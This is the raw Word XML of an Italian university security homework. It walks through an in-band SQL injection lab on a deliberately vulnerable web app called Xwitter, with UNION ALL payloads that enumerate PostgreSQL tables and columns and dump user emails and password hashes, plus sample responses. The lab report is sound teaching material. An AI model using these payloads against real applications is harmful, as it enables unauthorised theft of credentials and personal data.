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360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="114935" distR="114935" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1170305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>294640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3420110" cy="1005840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="861F41"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SAPIENZA UNIVERSITÀ DI ROMA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="560" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Homework sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SQL injection in-band sull’applicazione web Xwitter</w:t>
        <w:br/>
        <w:t>Simulazione di laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Studente: Simone Di Berardino</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Matricola: 2085977</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Corso: Sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Anno accademico 2025/2026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Indice generale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Saltoaindice"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \f \o "1-9" \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Saltoaindice"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="__RefHeading___Toc184_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>1. Introduzione</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc186_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>2. Contesto applicativo</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc200_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>3. Punto di iniezione: pagina Search user</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc192_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>4. Raccolta di informazioni sulla struttura del database</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="8789"/>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc194_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>4.1 Nomi delle tabelle</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="8789"/>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc196_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>4.2 Nomi delle colonne della tabella users</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc198_3264099342">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Saltoaindice"/>
              </w:rPr>
              <w:t>5. Esfiltrazione dei dati</w:t>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Saltoaindice"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr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84_3264099342"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr/>
        <w:t>1. Introduzione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Questo documento descrive una simulazione universitaria di attacco SQL injection di tipo in-band, condotta su un’applicazione web realizzata per il laboratorio (Xwitter). L’applicazione è volutamente vulnerabile: l’obiettivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrare come un input utente non controllato possa violare le proprietà di riservatezza, integrità e disponibilità (CIA) di un database </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>relazionale</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.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>La traccia richiede di raccogliere informazioni sulla struttura del database, esfiltrare dati da una o più tabelle, modificare il contenuto del database e cancellare una o più tabelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="__RefHeading___Toc186_3264099342"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
        <w:t>2. Contesto applicativo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="__RefHeading___Toc188_3264099342"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Xwitter è una piccola applicazione social: registrazione, login, pubblicazione di post e ricerca utenti. Il frontend è in React; il backend è in Go e interroga PostgreSQL. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="__RefHeading___Toc200_3264099342"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:t>3. Punto di iniezione: pagina Search user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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La pagina Search user è vulnerabile a SQL injection. Il testo della search bar viene </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nterpolato in una stringa del tipo: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72"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="907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fill="F3F3F3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nsolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SELECT id, username, email, display_name, bio, created_at</w:t>
              <w:br/>
              <w:t>FROM users</w:t>
              <w:br/>
              <w:t>WHERE username ILIKE '&lt;input&gt;'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>L’applicazione chiude l’input con un apice finale. Per questo le stringhe iniettate chiudono l’apice dopo un valore fittizio (test), aprono una UNION ALL e lasciano l’ultimo apice incompleto: è il quote messo dal backend a chiudere l’espressione. Si usano tautologia ('0' = '0) e commento/chiusura di stringa, come richiesto dalla traccia per un attacco in-band basato su input utente. I risultati compaiono nella risposta della search e nei log di rete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="__RefHeading___Toc192_3264099342"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr/>
        <w:t>4. Raccolta di informazioni sulla struttura del database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>L’attaccante non conosce a priori lo schema. Si procede quindi per enumerazione, sfruttando information_schema e il catalogo di PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="__RefHeading___Toc194_3264099342"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr/>
        <w:t>4.1 Nomi delle tabelle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Nella search bar è stato inserito il seguente input. La UNION allinea </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> colonne alla SELECT originale; il nome tabella viene messo in seconda posizione, cioè nel campo username della risposta.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72"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="907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fill="F3F3F3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nsolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test' UNION ALL SELECT</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    table_name,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL</w:t>
              <w:br/>
              <w:t>FROM information_schema.tables</w:t>
              <w:br/>
              <w:t>WHERE table_type = 'BASE TABLE' AND table_schema = 'public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>Nei log di rete la risposta è un array di User; il nome tabella resta nel campo username. Si ricavano così le tabelle dello schema public: users e posts.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72"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="907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fill="F3F3F3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nsolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "id": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "username": "users",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "displayName": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "bio": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "createdAt": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "postCount": "0"</w:t>
              <w:br/>
              <w:t xml:space="preserve">  },</w:t>
              <w:br/>
              <w:t xml:space="preserve">  {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "id": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "username": "posts",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "displayName": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "bio": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "createdAt": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "postCount": "0"</w:t>
              <w:br/>
              <w:t xml:space="preserve">  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6" w:name="__RefHeading___Toc196_3264099342"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr/>
        <w:t>4.2 Nomi delle colonne della tabella users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Nota la tabella users, si enumerano le colonne tramite pg_catalog.pg_attribute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>utilizzando la seguente SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Anche in questo caso il nome colonna è mappato sul campo username del DTO User.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72"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="907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fill="F3F3F3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nsolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test' UNION ALL SELECT</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    a.attname AS column_name,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL</w:t>
              <w:br/>
              <w:t>FROM pg_catalog.pg_attribute a</w:t>
              <w:br/>
              <w:t>WHERE a.attrelid = 'public.users'::regclass</w:t>
              <w:br/>
              <w:t xml:space="preserve">  AND a.attnum &gt; 0</w:t>
              <w:br/>
              <w:t xml:space="preserve">  AND NOT a.attisdropped</w:t>
              <w:br/>
              <w:t xml:space="preserve">  AND '1' = '1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In questo modo si ottengono i nomi delle colonne di users, tra cui </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">password_hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>che non erano incluse nella select originale relativa alla ricerca degli utenti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Con questi due passi si considera raggiunto l’obiettivo «raccogliere informazioni sulla struttura del DB o sulla sua configurazione».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="__RefHeading___Toc198_3264099342"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr/>
        <w:t>5. Esfiltrazione dei dati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A questo punto è possibile costruire una ulteriore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION per leggere gli hash delle password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>e le mail degli utenti selezionando le colonne segrete che sono state scoperte al passo precedente.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L’input seguente seleziona id, display_name, email, username e password_hash. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In base all’ordine delle colonne riportato di seguito, abbiamo che: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>- la email dell’utente è riportata al posto del display_name</w:t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>- l’hash della password dell’utente è riportata al posto della bio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072"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="907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fill="F3F3F3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nsolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test' UNION ALL SELECT id, display_name, email, password_hash, null FROM users WHERE '0' = '0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La tautologia '0' = '0, chiusa dall’apice del backend, fa sì che la UNION restituisca tutte le righe di users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>con email e password: r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>esta così dimostrato l’obiettivo «esfiltrare dati contenuti in una o più tabelle del database» e la violazione della riservatezza (Confidentiality).</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId3"/>
      <w:footerReference w:type="default" r:id="rId4"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="1417" w:right="1417" w:gutter="0" w:header="454" w:top="1247" w:footer="454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  <w:font w:name="Consola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Fonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="444444"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Pagina </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="444444"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:t>5</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="444444"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> di </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="444444"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:t>5</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="44444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12" w:space="6" w:color="861F41"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9071" w:leader="none"/>
        <w:tab w:val="right" w:pos="9360" w:leader="none"/>
      </w:tabs>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0">
          <wp:extent cx="1871980" cy="550545"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="2" name="Immagin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71980" cy="5505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eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="861F41"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:tab/>
      <w:t>Homework sicurezza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200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
